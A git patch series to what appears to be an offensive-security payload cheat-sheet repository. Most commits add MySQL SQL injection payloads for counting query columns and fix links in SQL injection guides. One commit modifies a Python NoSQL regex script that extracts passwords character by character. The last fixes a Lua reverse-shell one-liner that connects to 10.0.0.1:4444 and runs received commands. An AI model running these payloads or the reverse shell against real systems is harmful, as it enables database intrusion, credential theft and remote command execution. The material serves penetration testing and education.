From f81f9440b8ecbbae9eaf20f4049fd767e15b4c9c Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 16:32:22 +0530 Subject: [PATCH 01/13] Added More Ways to Detect columns number using order by or group by using order by or group by error based using UNION SELECT Error Based --- SQL Injection/MySQL Injection.md | 55 +++++++++++++++++++++++++++----- 1 file changed, 47 insertions(+), 8 deletions(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index f61cc52..979aa8b 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -3,8 +3,8 @@ ## Summary * [MYSQL Comment](#mysql-comment) -* [Detect columns number](#detect-columns-number) * [MYSQL Union Based](#mysql-union-based) + * [Detect columns number](#detect-columns-number) * [Extract database with information_schema](#extract-database-with-information-schema) * [Extract data without information_schema](#extract-data-without-information-schema) * [Extract data without columns name](#extract-data-without-columns-name) @@ -46,17 +46,56 @@ ## MYSQL Union Based -### Extract database with information_schema +### Detect columns number -First you need to know the number of columns, you can use `order by`. +First you need to know the number of columns + +#### using `order by` or `group by` + +Keep incrementing the number until you get a False response. +Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query. ```sql -order by 1 -order by 2 -order by 3 -... -order by XXX +1' ORDER BY 1--+ #True +1' ORDER BY 2--+ #True +1' ORDER BY 3--+ #True +1' ORDER BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True ``` +or +```sql +1' GROUP BY 1--+ #True +1' GROUP BY 2--+ #True +1' GROUP BY 3--+ #True +1' GROUP BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True +``` +#### using `order by` or `group by` Error Based +Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled. +```sql +1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'order clause' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +or +```sql +1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'group statement' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +#### using `UNION SELECT` Error Based +This method works if error showing is enabled +```sql +1' UNION SELECT @--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From 614e8a97b9acf59ebd9e265fad488e43b714bfa5 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 16:48:11 +0530 Subject: [PATCH 02/13] Updated Detect columns number Detect columns number using LIMIT INTO Error Based --- SQL Injection/MySQL Injection.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 979aa8b..783d913 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -95,6 +95,16 @@ This method works if error showing is enabled 1' UNION SELECT @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` +#### using `LIMIT INTO` Error Based +This method works if error showing is enabled. + +It is useful for finding the number of columns when the injection point is after a LIMIT clause. +```sql +1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` ### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From 7d6fab92fa65ee282f70809f50c12df5649ad281 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:11:58 +0530 Subject: [PATCH 03/13] Update Detect columns number Using SELECT * FROM SOME_EXISTING_TABLE Error Based --- SQL Injection/MySQL Injection.md | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 783d913..1a475e7 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -50,7 +50,7 @@ First you need to know the number of columns -#### using `order by` or `group by` +##### Using `order by` or `group by` Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query. @@ -70,7 +70,7 @@ or 1' GROUP BY 4--+ #False - Query is only using 3 columns #-1' UNION SELECT 1,2,3--+ True ``` -#### using `order by` or `group by` Error Based +##### Using `order by` or `group by` Error Based Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled. ```sql 1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ @@ -87,7 +87,7 @@ or # This error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` -#### using `UNION SELECT` Error Based +##### Using `UNION SELECT` Error Based This method works if error showing is enabled ```sql 1' UNION SELECT @--+ #The used SELECT statements have a different number of columns @@ -95,7 +95,7 @@ This method works if error showing is enabled 1' UNION SELECT @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` -#### using `LIMIT INTO` Error Based +##### Using `LIMIT INTO` Error Based This method works if error showing is enabled. It is useful for finding the number of columns when the injection point is after a LIMIT clause. @@ -105,6 +105,16 @@ It is useful for finding the number of columns when the injection point is after 1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` +##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based +This works if you know the table name you're after and error showing is enabled. + +It will return the amount of columns in the table, not the query. + +```sql +1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s) + # This error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` ### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From a33dce0d6077e15010689efe7b9e71d81c91aa30 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:25:00 +0530 Subject: [PATCH 04/13] Fixed Broken Links --- SQL Injection/MySQL Injection.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 1a475e7..9dd034c 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -5,8 +5,8 @@ * [MYSQL Comment](#mysql-comment) * [MYSQL Union Based](#mysql-union-based) * [Detect columns number](#detect-columns-number) - * [Extract database with information_schema](#extract-database-with-information-schema) - * [Extract data without information_schema](#extract-data-without-information-schema) + * [Extract database with information_schema](#extract-database-with-information_schema) + * [Extract columns name without information_schema](#extract-columns-name-without-information_schema) * [Extract data without columns name](#extract-data-without-columns-name) * [MYSQL Error Based](#mysql-error-based) * [MYSQL Error Based - Basic](#mysql-error-based---basic) @@ -15,10 +15,10 @@ * [MYSQL Blind](#mysql-blind) * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) - * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) + * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set) * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) - * [Using SLEEP in a subselect](#using-asleep-in-a-subselect) + * [Using SLEEP in a subselect](#using-sleep-in-a-subselect) * [Using conditional statements](#using-conditional-statements) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Current queries](#mysql-current-queries) From ca59b1d21789f95fbce1b41a3a1397fe93dfbf01 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:44:28 +0530 Subject: [PATCH 05/13] Fixed Broken Links in MSSQL Injection Fixed Broken Links in MSSQL Injection --- SQL Injection/MSSQL Injection.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index fa30aa6..0e79365 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -5,18 +5,18 @@ * [MSSQL comments](#mssql-comments) * [MSSQL version](#mssql-version) * [MSSQL database name](#mssql-database-name) -* [MSSQL List databases](#mssql-list-database) +* [MSSQL List databases](#mssql-list-databases) * [MSSQL List columns](#mssql-list-columns) * [MSSQL List tables](#mssql-list-tables) -* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Extract user/password](#mssql-extract-userpassword) * [MSSQL Union Based](#mssql-union-based) * [MSSQL Error Based](#mssql-error-based) * [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Time Based](#mssql-time-based) -* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Stacked query](#mssql-stacked-query) * [MSSQL Command execution](#mssql-command-execution) * [MSSQL UNC path](#mssql-unc-path) -* [MSSQL Make user DBA](#mssql-make-user-dba) +* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) ## MSSQL comments From 20d6599772a6ce3774fda00dbe64f8c585d4abf5 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:57:33 +0530 Subject: [PATCH 06/13] Added Summary --- SQL Injection/OracleSQL Injection.md | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 0228cd9..633e24c 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -1,5 +1,18 @@ # Oracle SQL Injection +## Summary + +* [Oracle SQL version](#oracle-sql-version) +* [Oracle SQL database name](#oracle-sql-database-name) +* [Oracle SQL List databases](#oracle-sql-list-databases) +* [Oracle SQL List columns](#oracle-sql-list-columns) +* [Oracle SQL List tables](#oracle-sql-list-tables) +* [Oracle SQL Error Based](#oracle-sql-error-based) +* [Oracle SQL Blind](#oracle-sql-blind) +* [Oracle SQL Time Based](#oracle-sql-time-based) +* [Oracle SQL Command execution](#oracle-sql-command-execution) +* [References](#references) + ## Oracle SQL version ```sql @@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL; SELECT DISTINCT owner FROM all_tables; ``` -## Oracle SQL List Column +## Oracle SQL List Columns ```sql SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; From 4b1f7e629d740c0cb71848983fe0ec06bb37c844 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:06:41 +0530 Subject: [PATCH 07/13] Fixed Broken Links in PostgreSQL Injection --- SQL Injection/PostgreSQL Injection.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 2bf952c..00bbbf4 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -20,8 +20,8 @@ * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) - * [CVE-2019–9193](#cve-2019–9193) - * [Using libc.so.6](#using-libc-so-6) + * [CVE-2019–9193](#cve-20199193) + * [Using libc.so.6](#using-libcso6) * [References](#references) ## PostgreSQL Comments From a69c2acb7d61a94abc553d03a906c54704820392 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:22:49 +0530 Subject: [PATCH 08/13] Added Summary in SQLite Injection --- SQL Injection/SQLite Injection.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 0631c0b..428e806 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -1,5 +1,18 @@ # SQLite Injection +## Summary + +* [SQLite comments](#sqlite-comments) +* [SQLite version](#sqlite-version) +* [Integer/String based - Extract table name](#integerstring-based---extract-table-name) +* [Integer/String based - Extract column name](#integerstring-based---extract-column-name) +* [Boolean - Count number of tables](#boolean---count-number-of-tables) +* [Boolean - Enumerating table name](#boolean---enumerating-table-name) +* [Boolean - Extract info](#boolean---extract-info) +* [Time based](#time-based) +* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) +* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) +* [References](#references) ## SQLite comments ```sql From fe8c7be2fb80679255c4451f9a8b3e9d9725c272 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:33:09 +0530 Subject: [PATCH 09/13] Fixed Broken Links in SQL injection README.md --- SQL Injection/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8099f6d..5074f5f 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including: * [SQL injection using SQLmap](#sql-injection-using-sqlmap) * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) - * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie) + * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie) * [Second order injection](#second-order-injection) * [Shell](#shell) * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) @@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) - * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list) + * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) From 4d94e553b9fed521232a60cde01ade899ab02c75 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:42:49 +0530 Subject: [PATCH 10/13] Added Summary in Cassandra Injection --- SQL Injection/Cassandra Injection.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/SQL Injection/Cassandra Injection.md b/SQL Injection/Cassandra Injection.md index e66949e..2396618 100644 --- a/SQL Injection/Cassandra Injection.md +++ b/SQL Injection/Cassandra Injection.md @@ -2,6 +2,14 @@ > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system +## Summary + +* [Cassandra comment](#cassandra-comment) +* [Cassandra - Login Bypass](#cassandra---login-bypass) + * [Login Bypass 0](#login-bypass-0) + * [Login Bypass 1](#login-bypass-1) +* [References](#references) + ## Cassandra comment ```sql @@ -34,4 +42,4 @@ Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://h ## References -* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file +* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) From d41e0d33bde447476bf457ed93451a9504e50890 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:47:42 +0530 Subject: [PATCH 11/13] Added Summary in Hibernate Query Language Injection --- SQL Injection/HQL Injection.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 0086f10..6e8168b 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -1,6 +1,12 @@ # Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia +## Summary + +* [HQL Comments](#hql-comments) +* [HQL List Columns](#hql-list-columns) +* [HQL Error Based](#hql-error-based) +* [References](#references) ## HQL Comments @@ -49,4 +55,4 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) -* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) \ No newline at end of file +* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) From 694e9e4dbd503eb80e9650eb5d8a6979826abb6c Mon Sep 17 00:00:00 2001 From: Reelix Date: Tue, 29 Oct 2019 21:11:56 +0200 Subject: [PATCH 12/13] Added an alternate possible Found condition to POST --- NoSQL Injection/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index b52f6bf..7c203b8 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -89,8 +89,8 @@ while True: for c in string.printable: if c not in ['*','+','.','?','|']: payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) - r = requests.post(u, data = payload, headers = headers, verify = False) - if 'OK' in r.text: + r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) + if 'OK' in r.text or r.status_code == 302: print("Found one more char : %s" % (password+c)) password += c ``` From 6b22d53257a272b2facac28cbc6a487f58fc8015 Mon Sep 17 00:00:00 2001 From: Dave <47663767+cydave@users.noreply.github.com> Date: Tue, 29 Oct 2019 19:31:07 +0000 Subject: [PATCH 13/13] Fix lua reverse shell quote issue The single quotes around `io.popen` prevented the one-liner to be executed. This change should fix that :) --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index cf91cc2..60cd02a 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -203,7 +203,7 @@ lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','424 Windows and Linux ```powershell -lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ### NodeJS